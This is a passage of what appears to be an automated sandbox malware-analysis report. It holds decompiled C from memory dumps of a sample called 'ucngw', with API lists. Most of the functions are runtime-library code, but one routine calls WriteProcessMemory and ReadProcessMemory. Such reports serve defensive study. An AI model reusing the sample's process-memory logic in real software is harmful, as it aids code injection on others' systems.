    				intOrPtr _t63;
    				intOrPtr* _t65;
    				void* _t68;
    				intOrPtr* _t70;
    				void* _t73;
    
    				_t70 =  *((intOrPtr*)(_t73 + 0x30));
    				 *((intOrPtr*)(_t73 + 0x14)) = __ecx;
    				_t68 = 0;
    				_t57 =  *((intOrPtr*)(_t70 + 8));
    				_t65 =  *_t70;
    				 *((intOrPtr*)(_t73 + 0x20)) = 0;
    				 *((intOrPtr*)(_t73 + 0x24)) = 0x1001f2d0;
    				 *((intOrPtr*)(_t73 + 0x28)) = _t57;
    				_t63 = _t65 + _t57;
    				 *((intOrPtr*)(_t73 + 0x2c)) = 0;
    				 *((intOrPtr*)(_t73 + 0x1c)) = _t63;
    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) != 0) {
    					L25:
    					_t42 =  !=  ?  *((intOrPtr*)(_t73 + 0x38)) : 0;
    					 *((intOrPtr*)(_t70 + 0xc)) =  !=  ?  *((intOrPtr*)(_t73 + 0x38)) : 0;
    					return _t68;
    				} else {
    					_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t70 + 4))));
    					if(_t45 > 6) {
    						goto L25;
    					} else {
    						switch( *((intOrPtr*)(( *(_t45 + 0x10014328) & 0x000000ff) * 4 +  &M1001431C))) {
    							case 0:
    								_t71 = __edx;
    								_t55 = _t65 + __edx;
    								while(_t55 <= _t63) {
    									_t69 = _t65;
    									_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x14))));
    									_t52 = _t71 - 4;
    									if(_t52 < 0) {
    										L8:
    										if(_t52 == 0xfffffffc) {
    											goto L17;
    										} else {
    											goto L9;
    										}
    									} else {
    										while( *_t64 ==  *_t69) {
    											_t64 = _t64 + 4;
    											_t69 = _t69 + 4;
    											_t52 = _t52 - 4;
    											if(_t52 >= 0) {
    												continue;
    											} else {
    												goto L8;
    											}
    											goto L18;
    										}
    										L9:
    										if( *_t64 !=  *_t69) {
    											L16:
    											_t68 = 0;
    										} else {
    											if(_t52 == 0xfffffffd) {
    												L17:
    												_t68 = 1;
    											} else {
    												_t18 = _t69 + 1; // 0x1001e3
    												if( *((intOrPtr*)(_t64 + 1)) !=  *_t18) {
    													goto L16;
    												} else {
    													if(_t52 == 0xfffffffe) {
    														goto L17;
    													} else {
    														_t20 = _t69 + 2; // 0x1001
    														if( *((intOrPtr*)(_t64 + 2)) !=  *_t20) {
    															goto L16;
    														} else {
    															if(_t52 == 0xffffffff) {
    																goto L17;
    															} else {
    																_t22 = _t69 + 3; // 0x8000010
    																if( *((intOrPtr*)(_t64 + 3)) ==  *_t22) {
    																	goto L17;
    																} else {
    																	goto L16;
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									L18:
    									_t63 =  *((intOrPtr*)(_t73 + 0x1c));
    									_t65 = _t65 + 1;
    									_t55 = _t55 + 1;
    									if(_t68 == 0) {
    										continue;
    									}
    									break;
    								}
    								_t48 =  !=  ? _t65 - 1 : 0;
    								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x38)) + 0xc)) =  !=  ? _t65 - 1 : 0;
    								return _t68;
    								goto L26;
    							case 1:
    								__eax = LocalAlloc(0x40, __ecx); // executed
    								 *(__esp + 0x20) = __eax;
    								if(__eax == 0) {
    									goto L25;
    								} else {
    									__edx = __ebp;
    									__ecx = __esp + 0x24;
    									if(E10014010(__esp + 0x24, __ebp,  *((intOrPtr*)(__ebp + 8))) == 0) {
    										L24:
    										__eax =  *(__esp + 0x20);
    										__edi =  *((intOrPtr*)(__esp + 0x38));
    										LocalFree( *(__esp + 0x20)) = 0;
    										__eax =  !=  ? __edi : 0;
    										 *((intOrPtr*)(__ebp + 0xc)) =  !=  ? __edi : 0;
    										__eax = __esi;
    										return __esi;
    									} else {
    										__ecx =  *(__esp + 0x14);
    										__eax = __esp + 0x20;
    										_push(0);
    										_push(__eax);
    										__edx = __ebx;
    										__esi = E10014190(__ecx, __ebx);
    										__esp = __esp + 8;
    										if(__esi == 0) {
    											goto L24;
    										} else {
    											__edi =  *__ebp;
    											__eax =  *(__esp + 0x20);
    											__edi =  *__ebp - __eax;
    											__edi =  *__ebp - __eax +  *((intOrPtr*)(__esp + 0x2c));
    											__eax = GlobalFree(__eax); // executed
    											0 =  !=  ? __edi : 0;
    											 *((intOrPtr*)(__ebp + 0xc)) =  !=  ? __edi : 0;
    											__eax = __esi;
    											return __esi;
    										}
    									}
    								}
    								goto L26;
    							case 2:
    								goto L25;
    						}
    					}
    				}
    				L26:
    			}











    APIs
    • LocalAlloc.KERNELBASE(00000040,00001001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10014277
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalFree.KERNEL32(?,00001DB1), ref: 100142EA
      • Part of subcall function 10014190: GlobalFree.KERNELBASE(?,?,?,00001DB1), ref: 100142C7
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 96%
    			E00C58A8F(signed int __edx, intOrPtr _a4) {
    				signed int _v8;
    				char _v264;
    				char _v520;
    				char _v776;
    				char _v1800;
    				char _v1814;
    				struct _cpinfo _v1820;
    				intOrPtr _v1824;
    				signed int _v1828;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t63;
    				void* _t67;
    				signed int _t68;
    				intOrPtr _t69;
    				void* _t72;
    				char _t73;
    				char _t74;
    				signed char _t75;
    				signed int _t76;
    				signed char _t86;
    				char _t87;
    				char _t89;
    				signed int _t92;
    				signed int _t93;
    				signed int _t94;
    				void* _t95;
    				char* _t96;
    				intOrPtr _t98;
    				signed int _t99;
    
    				_t94 = __edx;
    				_t63 =  *0xc6a004; // 0x26d30358
    				_v8 = _t63 ^ _t99;
    				_t98 = _a4;
    				if(GetCPInfo( *(_t98 + 4),  &_v1820) == 0) {
    					_t95 = _t98 + 0x119;
    					_t89 = 0;
    					_t67 = 0xffffff9f;
    					_t68 = _t67 - _t95;
    					__eflags = _t68;
    					_v1828 = _t68;
    					do {
    						_t96 = _t95 + _t89;
    						_t69 = _t68 + _t96;
    						_v1824 = _t69;
    						__eflags = _t69 + 0x20 - 0x19;
    						if(_t69 + 0x20 > 0x19) {
    							__eflags = _v1824 - 0x19;
    							if(_v1824 > 0x19) {
    								 *_t96 = 0;
    							} else {
    								_t72 = _t98 + _t89;
    								_t57 = _t72 + 0x19;
    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
    								__eflags =  *_t57;
    								_t59 = _t89 - 0x20; // -32
    								_t73 = _t59;
    								goto L24;
    							}
    						} else {
    							 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000010;
    							_t54 = _t89 + 0x20; // 0x20
    							_t73 = _t54;
    							L24:
    							 *_t96 = _t73;
    						}
    						_t68 = _v1828;
    						_t95 = _t98 + 0x119;
    						_t89 = _t89 + 1;
    						__eflags = _t89 - 0x100;
    					} while (_t89 < 0x100);
    				} else {
    					_t74 = 0;
    					do {
    						 *((char*)(_t99 + _t74 - 0x104)) = _t74;
    						_t74 = _t74 + 1;
    					} while (_t74 < 0x100);
    					_t75 = _v1814;
    					_t92 =  &_v1814;
    					_v264 = 0x20;
    					while(1) {
    						_t105 = _t75;
    						if(_t75 == 0) {
    							break;
    						}
    						_t94 =  *(_t92 + 1) & 0x000000ff;
    						_t76 = _t75 & 0x000000ff;
    						while(1) {
    							__eflags = _t76 - _t94;
    							if(_t76 > _t94) {
    								break;
    							}
    							__eflags = _t76 - 0x100;
    							if(_t76 < 0x100) {
    								 *((char*)(_t99 + _t76 - 0x104)) = 0x20;
    								_t76 = _t76 + 1;
    								__eflags = _t76;
    								continue;
    							}
    							break;
    						}
    						_t92 = _t92 + 2;
    						__eflags = _t92;
    						_t75 =  *_t92;
    					}
    					E00C59A8A(_t94, _t105, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t98 + 4), 0);
    					E00C5BC1C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t98 + 4), 0); // executed
    					E00C5BC1C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t98 + 4), 0);
    					_t93 = 0;
    					do {
    						_t86 =  *(_t99 + _t93 * 2 - 0x704) & 0x0000ffff;
    						if((_t86 & 0x00000001) == 0) {
    							__eflags = _t86 & 0x00000002;
    							if((_t86 & 0x00000002) == 0) {
    								 *((char*)(_t98 + _t93 + 0x119)) = 0;
    							} else {
    								_t37 = _t98 + _t93 + 0x19;
    								 *_t37 =  *(_t98 + _t93 + 0x19) | 0x00000020;
    								__eflags =  *_t37;
    								_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x304));
    								goto L15;
    							}
    						} else {
    							 *(_t98 + _t93 + 0x19) =  *(_t98 + _t93 + 0x19) | 0x00000010;
    							_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x204));
    							L15:
    							 *((char*)(_t98 + _t93 + 0x119)) = _t87;
    						}
    						_t93 = _t93 + 1;
    					} while (_t93 < 0x100);
    				}
    				return E00C51252(0, _v8 ^ _t99, 0x100, _t98);
    			}

    APIs
    • GetCPInfo.KERNEL32(?,?), ref: 00C58AB4
      • Part of subcall function 00C59A8A: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 00C59AD7
      • Part of subcall function 00C59A8A: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C59B60
      • Part of subcall function 00C59A8A: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C59B72
      • Part of subcall function 00C59A8A: __freea.LIBCMT ref: 00C59B7B
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 96%
    			E10009437(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
    				signed int _v8;
    				char _v264;
    				char _v520;
    				char _v776;
    				char _v1800;
    				char _v1814;
    				struct _cpinfo _v1820;
    				intOrPtr _v1824;
    				signed int _v1828;
    				signed int _t63;
    				void* _t67;
    				signed int _t68;
    				intOrPtr _t69;
    				void* _t72;
    				char _t73;
    				char _t74;
    				signed char _t75;
    				signed int _t76;
    				signed char _t86;
    				char _t87;
    				char _t90;
    				signed int _t93;
    				signed int _t94;
    				signed int _t95;
    				void* _t96;
    				char* _t97;
    				intOrPtr _t101;
    				signed int _t102;
    
    				_t95 = __edx;
    				_t63 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t63 ^ _t102;
    				_t101 = _a4;
    				_t4 = _t101 + 4; // 0x5efc4d8b
    				if(GetCPInfo( *_t4,  &_v1820) == 0) {
    					_t47 = _t101 + 0x119; // 0x10009a82
    					_t96 = _t47;
    					_t90 = 0;
    					_t67 = 0xffffff9f;
    					_t68 = _t67 - _t96;
    					__eflags = _t68;
    					_v1828 = _t68;
    					do {
    						_t97 = _t96 + _t90;
    						_t69 = _t68 + _t97;
    						_v1824 = _t69;
    						__eflags = _t69 + 0x20 - 0x19;
    						if(_t69 + 0x20 > 0x19) {
    							__eflags = _v1824 - 0x19;
    							if(_v1824 > 0x19) {
    								 *_t97 = 0;
    							} else {
    								_t72 = _t101 + _t90;
    								_t57 = _t72 + 0x19;
    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
    								__eflags =  *_t57;
    								_t59 = _t90 - 0x20; // -32
    								_t73 = _t59;
    								goto L24;
    							}
    						} else {
    							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
    							_t54 = _t90 + 0x20; // 0x20
    							_t73 = _t54;
    							L24:
    							 *_t97 = _t73;
    						}
    						_t68 = _v1828;
    						_t61 = _t101 + 0x119; // 0x10009a82
    						_t96 = _t61;
    						_t90 = _t90 + 1;
    						__eflags = _t90 - 0x100;
    					} while (_t90 < 0x100);
    				} else {
    					_t74 = 0;
    					do {
    						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
    						_t74 = _t74 + 1;
    					} while (_t74 < 0x100);
    					_t75 = _v1814;
    					_t93 =  &_v1814;
    					_v264 = 0x20;
    					while(1) {
    						_t108 = _t75;
    						if(_t75 == 0) {
    							break;
    						}
    						_t95 =  *(_t93 + 1) & 0x000000ff;
    						_t76 = _t75 & 0x000000ff;
    						while(1) {
    							__eflags = _t76 - _t95;
    							if(_t76 > _t95) {
    								break;
    							}
    							__eflags = _t76 - 0x100;
    							if(_t76 < 0x100) {
    								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
    								_t76 = _t76 + 1;
    								__eflags = _t76;
    								continue;
    							}
    							break;
    						}
    						_t93 = _t93 + 2;
    						__eflags = _t93;
    						_t75 =  *_t93;
    					}
    					_t13 = _t101 + 4; // 0x5efc4d8b
    					E1000D0F4(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
    					_t16 = _t101 + 4; // 0x5efc4d8b
    					_t19 = _t101 + 0x21c; // 0x874c084
    					E1000B13C(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
    					_t21 = _t101 + 4; // 0x5efc4d8b
    					_t23 = _t101 + 0x21c; // 0x874c084
    					E1000B13C(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
    					_t94 = 0;
    					do {
    						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
    						if((_t86 & 0x00000001) == 0) {
    							__eflags = _t86 & 0x00000002;
    							if((_t86 & 0x00000002) == 0) {
    								 *((char*)(_t101 + _t94 + 0x119)) = 0;
    							} else {
    								_t37 = _t101 + _t94 + 0x19;
    								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
    								__eflags =  *_t37;
    								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
    								goto L15;
    							}
    						} else {
    							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
    							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
    							L15:
    							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
    						}
    						_t94 = _t94 + 1;
    					} while (_t94 < 0x100);
    				}
    				return E10001B26(_v8 ^ _t102);
    			}

    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 1000945C
      • Part of subcall function 1000D0F4: MultiByteToWideChar.KERNEL32(?,00000000,1BE85006,100031C9,00000000,00000000,1000405A,00000000,1000405A,?,00000001,100031C9,1BE85006,00000001,1000405A,1000405A), ref: 1000D141
      • Part of subcall function 1000D0F4: __alloca_probe_16.NTDLLP ref: 1000D179
      • Part of subcall function 1000D0F4: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000D1CA
      • Part of subcall function 1000D0F4: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000D1DC
      • Part of subcall function 1000D0F4: __freea.LIBCMT ref: 1000D1E5
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 34%
    			E00C59349(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				void* __esi;
    				signed int _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t33;
    				void* _t34;
    				signed int _t35;
    
    				_t31 = __edi;
    				_t27 = __ecx;
    				_t26 = __ebx;
    				_push(__ecx);
    				_t18 =  *0xc6a004; // 0x26d30358
    				_v8 = _t18 ^ _t35;
    				_t20 = E00C59075(0x16, "LCMapStringEx", 0xc6477c, "LCMapStringEx"); // executed
    				_t33 = _t20;
    				if(_t33 == 0) {
    					LCMapStringW(E00C593D1(__ebx, _t27, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
    				} else {
    					 *0xc63148(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
    					 *_t33();
    				}
    				_pop(_t34);
    				return E00C51252(_t26, _v8 ^ _t35, _t31, _t34);
    			}

    APIs
      • Part of subcall function 00C59075: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C593BA
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 30%
    			E10006B9A(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				signed int _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t31;
    				signed int _t33;
    
    				_t26 = __ecx;
    				_push(__ecx);
    				_t18 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t18 ^ _t33;
    				_push(__esi);
    				_t20 = E100068C6(0x16, "LCMapStringEx", 0x10016c3c, "LCMapStringEx"); // executed
    				_t31 = _t20;
    				if(_t31 == 0) {
    					LCMapStringW(E10006C22(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
    				} else {
    					 *0x10015138(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
    					 *_t31();
    				}
    				return E10001B26(_v8 ^ _t33);
    			}

    APIs
      • Part of subcall function 100068C6: GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000,?,?,?,100051C5), ref: 10006926
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,1BE85006,00000001,?,000000FF), ref: 10006C0B
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 17%
    			E00C592E7(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				signed int _v8;
    				void* __esi;
    				signed int _t8;
    				void* _t15;
    				void* _t20;
    				intOrPtr* _t22;
    				void* _t23;
    				signed int _t24;
    
    				_t20 = __edi;
    				_t15 = __ebx;
    				_push(__ecx);
    				_t8 =  *0xc6a004; // 0x26d30358
    				_v8 = _t8 ^ _t24;
    				_t22 = E00C59075(0x14, "InitializeCriticalSectionEx", 0xc64774, 0xc6477c);
    				if(_t22 == 0) {
    					InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
    				} else {
    					 *0xc63148(_a4, _a8, _a12);
    					 *_t22();
    				}
    				_pop(_t23);
    				return E00C51252(_t15, _v8 ^ _t24, _t20, _t23);
    			}

    APIs
      • Part of subcall function 00C59075: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?,00C56F11), ref: 00C59332
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    • InitializeCriticalSectionEx, xrefs: 00C59302
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 16%
    			E00C5918C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				void* __esi;
    				signed int _t4;
    				intOrPtr* _t6;
    				void* _t11;
    				void* _t16;
    				intOrPtr* _t18;
    				void* _t19;
    				signed int _t20;
    
    				_t16 = __edi;
    				_t11 = __ebx;
    				_push(__ecx);
    				_t4 =  *0xc6a004; // 0x26d30358
    				_v8 = _t4 ^ _t20;
    				_t6 = E00C59075(3, "FlsAlloc", 0xc64738, 0xc64740); // executed
    				_t18 = _t6;
    				if(_t18 == 0) {
    					TlsAlloc();
    				} else {
    					 *0xc63148(_a4);
    					 *_t18();
    				}
    				_pop(_t19);
    				return E00C51252(_t11, _v8 ^ _t20, _t16, _t19);
    			}

    APIs
      • Part of subcall function 00C59075: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
    • TlsAlloc.KERNEL32 ref: 00C591CB
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 16%
    			E100069DD(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				signed int _t4;
    				intOrPtr* _t6;
    				intOrPtr* _t16;
    				signed int _t18;
    
    				_push(__ecx);
    				_t4 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t4 ^ _t18;
    				_t6 = E100068C6(3, "FlsAlloc", 0x10016bf8, 0x10016c00); // executed
    				_t16 = _t6;
    				if(_t16 == 0) {
    					TlsAlloc();
    				} else {
    					 *0x10015138(_a4);
    					 *_t16();
    				}
    				return E10001B26(_v8 ^ _t18);
    			}

    APIs
      • Part of subcall function 100068C6: GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000,?,?,?,100051C5), ref: 10006926
    • TlsAlloc.KERNEL32 ref: 10006A1C
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 68%
    			E00C540B5(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				intOrPtr* _t6;
    				intOrPtr* _t10;
    
    				_t6 = E00C53EA6(8, "InitializeCriticalSectionEx", 0xc63360, "InitializeCriticalSectionEx"); // executed
    				_t10 = _t6;
    				if(_t10 == 0) {
    					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
    				}
    				L00C51C94();
    				return  *_t10(_a4, _a8, _a12);
    			}

    APIs
      • Part of subcall function 00C53EA6: GetProcAddress.KERNEL32(00000000,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34,00C6AD38,00000FA0), ref: 00C53F0A
    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 00C540F2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 100%
    			E10011190(void* __edx, void* __eflags) {
    				intOrPtr _t2;
    				intOrPtr _t4;
    
    				E100111D0(__eflags);
    				_t2 =  *0x1001f2d8; // 0xd1378
    				if(_t2 != 0) {
    					E10001010(L"%ls\n", _t2);
    					_t4 =  *0x1001f2d8; // 0xd1378
    					return _t4;
    				}
    				return _t2;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 90%
    			E00C58DE4(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				signed int _v36;
    				void* __ebx;
    				void* __esi;
    				signed int _t48;
    				int _t51;
    				signed int _t54;
    				signed int _t55;
    				short _t58;
    				signed char _t62;
    				signed int _t63;
    				signed char* _t72;
    				signed char* _t73;
    				int _t77;
    				signed int _t80;
    				signed char* _t81;
    				short* _t82;
    				int _t86;
    				signed char _t87;
    				signed int _t88;
    				signed int _t90;
    				signed int _t91;
    				int _t93;
    				int _t94;
    				intOrPtr _t96;
    				signed int _t97;
    
    				_t92 = __edi;
    				_t48 =  *0xc6a004; // 0x26d30358
    				_v8 = _t48 ^ _t97;
    				_t96 = _a8;
    				_t77 = E00C589B7(__eflags, _a4);
    				if(_t77 != 0) {
    					_push(__edi);
    					_t93 = 0;
    					__eflags = 0;
    					_t80 = 0;
    					_t51 = 0;
    					_v32 = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t51 + 0xc6a2f8)) - _t77;
    						if( *((intOrPtr*)(_t51 + 0xc6a2f8)) == _t77) {
    							break;
